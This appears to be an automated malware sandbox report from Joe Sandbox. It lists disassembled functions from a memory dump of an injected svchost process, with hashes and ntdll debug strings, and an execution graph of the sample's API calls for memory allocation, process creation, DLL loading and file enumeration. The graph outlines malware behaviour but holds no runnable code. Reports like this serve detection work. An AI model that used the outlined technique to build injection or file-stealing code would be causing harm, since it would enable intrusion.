                                                                                                                                                                              • Instruction Fuzzy Hash: 2F90023120240802E100B6989448686004687E0301F95D011A5424559EC76589916131
                                                                                                                                                                              Function 03072CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: bdbcd088faca9f3c05814db7a46bf6bf29a746507b89a9c3545c636118321c7b
                                                                                                                                                                              • Instruction ID: 6efa049e2cd7bab178828c8ec39d47d2b40bb7367f216bd2368c40e8e80b6f1e
                                                                                                                                                                              • Opcode Fuzzy Hash: bdbcd088faca9f3c05814db7a46bf6bf29a746507b89a9c3545c636118321c7b
                                                                                                                                                                              • Instruction Fuzzy Hash: CF90022160640802E140B2589458746005687D0301F95D011A0424558DC7598B5566A1
                                                                                                                                                                              Function 03072CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: d7bfd1d67c067e527357ab28a65b56ba167ca38312b873b8411bd24fa1830154
                                                                                                                                                                              • Instruction ID: 0ce7ff1fb4659e164e958a89da5dfcfd2d098133f1c4fb30ba6b3343c487472b
                                                                                                                                                                              • Opcode Fuzzy Hash: d7bfd1d67c067e527357ab28a65b56ba167ca38312b873b8411bd24fa1830154
                                                                                                                                                                              • Instruction Fuzzy Hash: F190023120240803E100B2589548747004687D0301F95D411A082455CDD75689516121
                                                                                                                                                                              Function 03072C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                              • Instruction ID: aa0057e010792f307a6ad3e6794302dc3919de950015b0dfa45c354223d9da06
                                                                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                              Function 03072890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                                              • Opcode ID: 7571d4bde9114c4bfa716bc39e82b9ad540c0fad8759619d06ce9268a5617136
                                                                                                                                                                              • Instruction ID: 3dd43c5e8df5d4a541ff5e8d49eaa179178be37ac947891ec34abaa15eb6841b
                                                                                                                                                                              • Opcode Fuzzy Hash: 7571d4bde9114c4bfa716bc39e82b9ad540c0fad8759619d06ce9268a5617136
                                                                                                                                                                              • Instruction Fuzzy Hash: 8851E9B5F02556BFCB60DBAC889057EF7FCBB48200B188569E4A5D7681D234DE40CBA4
                                                                                                                                                                              Function 03067630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 030A4725
                                                                                                                                                                              • ExecuteOptions, xrefs: 030A46A0
                                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 030A4787
                                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030A46FC
                                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 030A4655
                                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 030A4742
                                                                                                                                                                              • Execute=1, xrefs: 030A4713
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                                                              • Opcode ID: c965e57698fedb32bb65b30a8b9c00417ad74d81fea22995a627e93a9b9e56e0
                                                                                                                                                                              • Instruction ID: 78dcd32c70aaf640c9cab70d964d0d71dc444305b0533e176ea2e15831aeb794
                                                                                                                                                                              • Opcode Fuzzy Hash: c965e57698fedb32bb65b30a8b9c00417ad74d81fea22995a627e93a9b9e56e0
                                                                                                                                                                              • Instruction Fuzzy Hash: 16511B35A023197ADF25EBA9EC45FEE73B8EF44704F0404A9E505AB191D7B09A41CF51
                                                                                                                                                                              Function 0307B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction ID: f5ceeaa8e5a1b03da3c5f7c22b5059c6b783afc11a4e2b0d857a0c3f76189cf8
                                                                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction Fuzzy Hash: 4081AE70E072499FDF64CE68C8917FEBBF5AF45310F1C865AD861AB390C6349941CB58
                                                                                                                                                                              Function 0305F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030A02E7
                                                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030A02BD
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 030A031E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                                                              • Opcode ID: aa5b3dd0ed81022b3e495cd044bdbb230278ef5cfef707194830906af20f7347
                                                                                                                                                                              • Instruction ID: 2db8c7809eccb387bbab7755e55e440a5e1c3268c69996faf324d820e075a062
                                                                                                                                                                              • Opcode Fuzzy Hash: aa5b3dd0ed81022b3e495cd044bdbb230278ef5cfef707194830906af20f7347
                                                                                                                                                                              • Instruction Fuzzy Hash: 7BE1CD35606B46DFD764CF28C884B6BB7E4BB88314F184A6DF8A58B2D0D778D844CB42
                                                                                                                                                                              Function 0306BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 030A7B8E
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 030A7BAC
                                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 030A7B7F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                                                              • Opcode ID: 1bd38d0dfefade9024388b76cb4247a7291fe0d779d0a202cee1180e11bde72e
                                                                                                                                                                              • Instruction ID: 5c68524538c811c45ac33e6c267ec5267953106bd79f41ab44d2f7c244cb31fb
                                                                                                                                                                              • Opcode Fuzzy Hash: 1bd38d0dfefade9024388b76cb4247a7291fe0d779d0a202cee1180e11bde72e
                                                                                                                                                                              • Instruction Fuzzy Hash: DD4126757027029FC724DF6ACC40B6AB7E9EF88710F044A2DF85ADB290DB71E4058B91
                                                                                                                                                                              Function 0306B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030A728C
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 030A72A3
                                                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 030A7294
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 030A72C1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                                                              • Opcode ID: ed38c1ad9db818f2e3b0b3d77d36f88683240072877618fcb95b8c8b661dcc27
                                                                                                                                                                              • Instruction ID: 1a106c665ac3f352fff669199b654399dcfb32c0e85686191612411cfb348299
                                                                                                                                                                              • Opcode Fuzzy Hash: ed38c1ad9db818f2e3b0b3d77d36f88683240072877618fcb95b8c8b661dcc27
                                                                                                                                                                              • Instruction Fuzzy Hash: 6041F275702706ABC720DEA9CC41BAAB7E5FF84B10F148A29F855EB640DB21E81287D1
                                                                                                                                                                              Function 03077D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-
                                                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction ID: abd2e0749aab9e49970beb63c65aea8394311e1fb8954c30f016bce8e0254830
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction Fuzzy Hash: 3691D670E0220A9BDF64DF69C9857BEB7F5FF44BA0F18851AE865E72C0D73089418768
                                                                                                                                                                              Function 03039126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$@
                                                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                                                              • Opcode ID: eb1fcc16ae508bd7c970d6c938cc0dc52c47e1f6cfdc15088a9195b025f5fd8f
                                                                                                                                                                              • Instruction ID: f95edb3e29bdc727553f147ea92e2464b4e180261d036fb99a993f21c44497c0
                                                                                                                                                                              • Opcode Fuzzy Hash: eb1fcc16ae508bd7c970d6c938cc0dc52c47e1f6cfdc15088a9195b025f5fd8f
                                                                                                                                                                              • Instruction Fuzzy Hash: 14813876D01269EBDB35DF54CC44BEEB7B8AB48710F0445EAA919B7280D7709E80CFA0

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:3.2%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                                                              Signature Coverage:1.6%
                                                                                                                                                                              Total number of Nodes:441
                                                                                                                                                                              Total number of Limit Nodes:70
                                                                                                                                                                              execution_graph 79002 809c00 79003 80a072 79002->79003 79003->79003 79004 80a4bc 79003->79004 79006 82b4c0 79003->79006 79007 82b4e6 79006->79007 79012 8041a0 79007->79012 79009 82b4f2 79010 82b52b 79009->79010 79015 825950 79009->79015 79010->79004 79019 8134b0 79012->79019 79014 8041ad 79014->79009 79016 8259b2 79015->79016 79018 8259bf 79016->79018 79043 811c60 79016->79043 79018->79010 79020 8134ca 79019->79020 79022 8134e3 79020->79022 79023 82a1e0 79020->79023 79022->79014 79025 82a1fa 79023->79025 79024 82a229 79024->79022 79025->79024 79030 828d80 79025->79030 79031 828d9d 79030->79031 79037 4832c0a 79031->79037 79032 828dc9 79034 82b860 79032->79034 79040 829af0 79034->79040 79036 82a2a2 79036->79022 79038 4832c11 79037->79038 79039 4832c1f LdrInitializeThunk 79037->79039 79038->79032 79039->79032 79041 829b0d 79040->79041 79042 829b1e RtlFreeHeap 79041->79042 79042->79036 79044 811c9b 79043->79044 79059 818170 79044->79059 79046 811ca3 79057 811f86 79046->79057 79070 82b940 79046->79070 79048 811cb9 79049 82b940 RtlAllocateHeap 79048->79049 79050 811cca 79049->79050 79051 82b940 RtlAllocateHeap 79050->79051 79052 811cdb 79051->79052 79058 811d72 79052->79058 79081 816cd0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 79052->79081 79055 811f32 79077 828290 79055->79077 79057->79018 79073 8147f0 79058->79073 79060 81819c 79059->79060 79082 818060 79060->79082 79063 8181e1 79066 829770 NtClose 79063->79066 79067 8181fd 79063->79067 79064 8181c9 79068 8181d4 79064->79068 79088 829770 79064->79088 79069 8181f3 79066->79069 79067->79046 79068->79046 79069->79046 79096 829aa0 79070->79096 79072 82b95b 79072->79048 79074 814814 79073->79074 79075 814850 LdrLoadDll 79074->79075 79076 81481b 79074->79076 79075->79076 79076->79055 79078 8282f2 79077->79078 79080 8282ff 79078->79080 79099 811fa0 79078->79099 79080->79057 79081->79058 79083 818156 79082->79083 79084 81807a 79082->79084 79083->79063 79083->79064 79091 828e20 79084->79091 79087 829770 NtClose 79087->79083 79089 82978a 79088->79089 79090 82979b NtClose 79089->79090 79090->79068 79092 828e3a 79091->79092 79095 48335c0 LdrInitializeThunk 79092->79095 79093 81814a 79093->79087 79095->79093 79097 829abd 79096->79097 79098 829ace RtlAllocateHeap 79097->79098 79098->79072 79115 818440 79099->79115 79101 81250a 79101->79080 79102 811fc0 79102->79101 79119 821440 79102->79119 79105 8121da 79128 82cb50 79105->79128 79106 81201e 79106->79101 79123 82ca20 79106->79123 79109 8121ef 79111 81223c 79109->79111 79134 810ab0 79109->79134 79111->79101 79113 810ab0 LdrInitializeThunk 79111->79113 79137 8183e0 79111->79137 79112 8183e0 LdrInitializeThunk 79114 812387 79112->79114 79113->79111 79114->79111 79114->79112 79116 81844d 79115->79116 79117 818475 79116->79117 79118 81846e SetErrorMode 79116->79118 79117->79102 79118->79117 79120 821459 79119->79120 79141 82b7d0 79120->79141 79122 821461 79122->79106 79124 82ca30 79123->79124 79125 82ca36 79123->79125 79124->79105 79126 82b940 RtlAllocateHeap 79125->79126 79127 82ca5c 79126->79127 79127->79105 79129 82cac0 79128->79129 79130 82b940 RtlAllocateHeap 79129->79130 79131 82cb1d 79129->79131 79132 82cafa 79130->79132 79131->79109 79133 82b860 RtlFreeHeap 79132->79133 79133->79131 79135 810ad2 79134->79135 79148 829a10 79134->79148 79135->79114 79138 8183f3 79137->79138 79153 828c70 79138->79153 79140 81841e 79140->79111 79144 8298e0 79141->79144 79143 82b801 79143->79122 79145 829911 79144->79145 79146 82997e 79144->79146 79145->79143 79147 829994 NtAllocateVirtualMemory 79146->79147 79147->79143 79149 829a2d 79148->79149 79152 4832c70 LdrInitializeThunk 79149->79152 79150 829a55 79150->79135 79152->79150 79154 828cf7 79153->79154 79156 828c9e 79153->79156 79158 4832dd0 LdrInitializeThunk 79154->79158 79155 828d1c 79155->79140 79156->79140 79158->79155 79159 817040 79160 81706a 79159->79160 79163 818210 79160->79163 79162 817094 79164 81822d 79163->79164 79170 828e70 79164->79170 79166 818284 79166->79162 79167 81827d 79167->79166 79175 828f50 79167->79175 79169 8182ad 79169->79162 79171 828f11 79170->79171 79173 828e9e 79170->79173 79180 4832f30 LdrInitializeThunk 79171->79180 79172 828f4a 79172->79167 79173->79167 79176 828f82 79175->79176 79177 829007 79175->79177 79176->79169 79181 4832d10 LdrInitializeThunk 79177->79181 79178 82904c 79178->79169 79180->79172 79181->79178 79182 82ca80 79183 82b860 RtlFreeHeap 79182->79183 79184 82ca95 79183->79184 79185 8296c0 79186 829740 79185->79186 79188 8296ee 79185->79188 79187 829756 NtDeleteFile 79186->79187 79189 821e00 79194 821e19 79189->79194 79190 821ea6 79191 821e61 79192 82b860 RtlFreeHeap 79191->79192 79193 821e71 79192->79193 79194->79190 79194->79191 79195 821ea1 79194->79195 79196 82b860 RtlFreeHeap 79195->79196 79196->79190 79197 8263c0 79198 82641a 79197->79198 79200 826427 79198->79200 79201 823dc0 79198->79201 79202 82b7d0 NtAllocateVirtualMemory 79201->79202 79204 823e01 79202->79204 79203 823f0e 79203->79200 79204->79203 79205 8147f0 LdrLoadDll 79204->79205 79206 823e47 79205->79206 79206->79203 79207 823e90 Sleep 79206->79207 79207->79206 79208 821601 79210 821622 79208->79210 79220 8295c0 79208->79220 79211 821640 79210->79211 79212 821655 79210->79212 79213 829770 NtClose 79211->79213 79214 829770 NtClose 79212->79214 79215 821649 79213->79215 79217 82165e 79214->79217 79216 821695 79217->79216 79218 82b860 RtlFreeHeap 79217->79218 79219 821689 79218->79219 79221 82966d 79220->79221 79223 8295ee 79220->79223 79222 829683 NtReadFile 79221->79222 79222->79210 79223->79210 79224 818b07 79225 818b0a 79224->79225 79226 818ac1 79225->79226 79228 817260 LdrInitializeThunk LdrInitializeThunk 79225->79228 79228->79226 79229 81108b PostThreadMessageW 79230 81109d 79229->79230 79231 81c8d0 79233 81c8f9 79231->79233 79232 81c9fd 79233->79232 79234 81c9a3 FindFirstFileW 79233->79234 79234->79232 79236 81c9be 79234->79236 79235 81c9e4 FindNextFileW 79235->79236 79237 81c9f6 FindClose 79235->79237 79236->79235 79237->79232 79238 829450 79239 829510 79238->79239 79241 829485 79238->79241 79240 829526 NtCreateFile 79239->79240 79247 4832ad0 LdrInitializeThunk 79248 8129d7 79251 816570 79248->79251 79250 812a23 79252 8165a3 79251->79252 79253 8165c7 79252->79253 79258 8292b0 79252->79258 79253->79250 79255 8165ea 79255->79253 79256 829770 NtClose 79255->79256 79257 81666a 79256->79257 79257->79250 79259 8292cd 79258->79259 79262 4832ca0 LdrInitializeThunk 79259->79262 79260 8292f9 79260->79255 79262->79260 79263 80b7a0 79264 82b7d0 NtAllocateVirtualMemory 79263->79264 79265 80ce11 79264->79265 79266 809ba0 79268 809baf 79266->79268 79267 809bf0 79268->79267 79269 809bdd CreateThread 79268->79269 79270 815e60 79271 8183e0 LdrInitializeThunk 79270->79271 79274 815e90 79270->79274 79271->79274 79273 815eda 79274->79273 79275 815ebc 79274->79275 79276 818360 79274->79276 79277 8183a4 79276->79277 79282 8183c5 79277->79282 79283 828a20 79277->79283 79279 8183b5 79280 8183d1 79279->79280 79281 829770 NtClose 79279->79281 79280->79274 79281->79282 79282->79274 79284 828a4e 79283->79284 79285 828aa6 79283->79285 79284->79279 79288 4834650 LdrInitializeThunk 79285->79288 79286 828acb 79286->79279 79288->79286 79289 812520 79290 828d80 LdrInitializeThunk 79289->79290 79291 812556 79290->79291 79294 829810 79291->79294 79293 81256b 79295 8298a8 79294->79295 79297 829841 79294->79297 79299 4832e80 LdrInitializeThunk 79295->79299 79296 8298d9 79296->79293 79297->79293 79299->79296 79305 828ba0 79306 828c38 79305->79306 79308 828bd1 79305->79308 79310 4832ee0 LdrInitializeThunk 79306->79310 79307 828c69 79310->79307 79311 8133a3 79312 818060 2 API calls 79311->79312 79313 8133b3 79312->79313 79314 829770 NtClose 79313->79314 79315 8133cf 79313->79315 79314->79315 79323 8176a7 79324 817654 79323->79324 79325 817682 79324->79325 79327 81b560 79324->79327 79328 81b586 79327->79328 79329 81b7b9 79328->79329 79354 829b80 79328->79354 79329->79325 79331 81b5fc 79331->79329 79332 82cb50 2 API calls 79331->79332 79333 81b61b 79332->79333 79333->79329 79334 81b6f2 79333->79334 79335 828d80 LdrInitializeThunk 79333->79335 79336 815de0 LdrInitializeThunk 79334->79336 79338 81b711 79334->79338 79337 81b67d 79335->79337 79336->79338 79337->79334 79340 81b686 79337->79340 79343 81b7a1 79338->79343 79361 8288a0 79338->79361 79339 81b6da 79342 8183e0 LdrInitializeThunk 79339->79342 79340->79329 79340->79339 79341 81b6b8 79340->79341 79357 815de0 79340->79357 79376 824ad0 LdrInitializeThunk 79341->79376 79347 81b6e8 79342->79347 79345 8183e0 LdrInitializeThunk 79343->79345 79350 81b7af 79345->79350 79347->79325 79349 81b778 79366 828960 79349->79366 79350->79325 79352 81b792 79371 828ae0 79352->79371 79355 829b9a 79354->79355 79356 829bab CreateProcessInternalW 79355->79356 79356->79331 79358 815de6 79357->79358 79359 828f50 LdrInitializeThunk 79358->79359 79360 815e1e 79359->79360 79360->79341 79362 8288d1 79361->79362 79363 828929 79361->79363 79362->79349 79377 48339b0 LdrInitializeThunk 79363->79377 79364 82894e 79364->79349 79367 8289e9 79366->79367 79369 828991 79366->79369 79378 4834340 LdrInitializeThunk 79367->79378 79368 828a0e 79368->79352 79369->79352 79372 828b69 79371->79372 79373 828b11 79371->79373 79379 4832fb0 LdrInitializeThunk 79372->79379 79373->79343 79374 828b8e 79374->79343 79376->79339 79377->79364 79378->79368 79379->79374 79380 81b030 79385 81ad40 79380->79385 79382 81b03d 79399 81a9c0 79382->79399 79384 81b059 79386 81ad65 79385->79386 79410 818650 79386->79410 79389 81aeb3 79389->79382 79391 81aeca 79391->79382 79392 81aec1 79392->79391 79394 81afb7 79392->79394 79429 81a410 79392->79429 79396 81b01a 79394->79396 79438 81a780 79394->79438 79397 82b860 RtlFreeHeap 79396->79397 79398 81b021 79397->79398 79398->79382 79400 81a9d6 79399->79400 79403 81a9e1 79399->79403 79401 82b940 RtlAllocateHeap 79400->79401 79401->79403 79402 81aa02 79402->79384 79403->79402 79404 818650 GetFileAttributesW 79403->79404 79405 81ad12 79403->79405 79408 81a410 RtlFreeHeap 79403->79408 79409 81a780 RtlFreeHeap 79403->79409 79404->79403 79406 82b860 RtlFreeHeap 79405->79406 79407 81ad2b 79405->79407 79406->79407 79407->79384 79408->79403 79409->79403 79411 818671 79410->79411 79412 818678 GetFileAttributesW 79411->79412 79413 818683 79411->79413 79412->79413 79413->79389 79414 8236a0 79413->79414 79415 8236ae 79414->79415 79416 8236b5 79414->79416 79415->79392 79417 8147f0 LdrLoadDll 79416->79417 79418 8236ea 79417->79418 79419 8236f9 79418->79419 79442 823160 LdrLoadDll 79418->79442 79420 82b940 RtlAllocateHeap 79419->79420 79425 8238a4 79419->79425 79422 823712 79420->79422 79423 82389a 79422->79423 79422->79425 79426 82372e 79422->79426 79424 82b860 RtlFreeHeap 79423->79424 79423->79425 79424->79425 79425->79392 79426->79425 79427 82b860 RtlFreeHeap 79426->79427 79428 82388e 79427->79428 79428->79392 79430 81a436 79429->79430 79443 81de40 79430->79443 79432 81a4a8 79434 81a630 79432->79434 79436 81a4c6 79432->79436 79433 81a615 79433->79392 79434->79433 79435 81a2d0 RtlFreeHeap 79434->79435 79435->79434 79436->79433 79448 81a2d0 79436->79448 79439 81a7a6 79438->79439 79440 81de40 RtlFreeHeap 79439->79440 79441 81a82d 79440->79441 79441->79394 79442->79419 79445 81de4a 79443->79445 79444 81de71 79444->79432 79445->79444 79446 82b860 RtlFreeHeap 79445->79446 79447 81deb4 79446->79447 79447->79432 79449 81a2ed 79448->79449 79452 81ded0 79449->79452 79451 81a3f3 79451->79436 79453 81def4 79452->79453 79454 81df9e 79453->79454 79455 82b860 RtlFreeHeap 79453->79455 79454->79451 79455->79454 79456 817430 79457 81744c 79456->79457 79461 81749f 79456->79461 79459 829770 NtClose 79457->79459 79457->79461 79458 8175d7 79460 817467 79459->79460 79466 816800 NtClose LdrInitializeThunk LdrInitializeThunk 79460->79466 79461->79458 79467 816800 NtClose LdrInitializeThunk LdrInitializeThunk 79461->79467 79463 8175b1 79463->79458 79468 8169d0 NtClose LdrInitializeThunk LdrInitializeThunk 79463->79468 79466->79461 79467->79463 79468->79458 79469 81fb30 79470 81fb94 79469->79470 79471 816570 2 API calls 79470->79471 79473 81fcc7 79471->79473 79472 81fcce 79473->79472 79498 816680 79473->79498 79475 81fd4a 79476 81fe82 79475->79476 79495 81fe73 79475->79495 79502 81f910 79475->79502 79477 829770 NtClose 79476->79477 79480 81fe8c 79477->79480 79479 81fd86 79479->79476 79481 81fd91 79479->79481 79482 82b940 RtlAllocateHeap 79481->79482 79483 81fdba 79482->79483 79484 81fdc3 79483->79484 79485 81fdd9 79483->79485 79486 829770 NtClose 79484->79486 79511 81f800 CoInitialize 79485->79511 79488 81fdcd 79486->79488 79489 81fde7 79514 829210 79489->79514 79491 81fe62 79492 829770 NtClose 79491->79492 79493 81fe6c 79492->79493 79494 82b860 RtlFreeHeap 79493->79494 79494->79495 79496 829210 LdrInitializeThunk 79497 81fe05 79496->79497 79497->79491 79497->79496 79499 8166a5 79498->79499 79518 8290a0 79499->79518 79503 81f92c 79502->79503 79504 8147f0 LdrLoadDll 79503->79504 79506 81f94a 79504->79506 79505 81f953 79505->79479 79506->79505 79507 8147f0 LdrLoadDll 79506->79507 79508 81fa1e 79507->79508 79509 8147f0 LdrLoadDll 79508->79509 79510 81fa78 79508->79510 79509->79510 79510->79479 79513 81f865 79511->79513 79512 81f8fb CoUninitialize 79512->79489 79513->79512 79515 82922a 79514->79515 79523 4832ba0 LdrInitializeThunk 79515->79523 79516 82925a 79516->79497 79519 8290bd 79518->79519 79522 4832c60 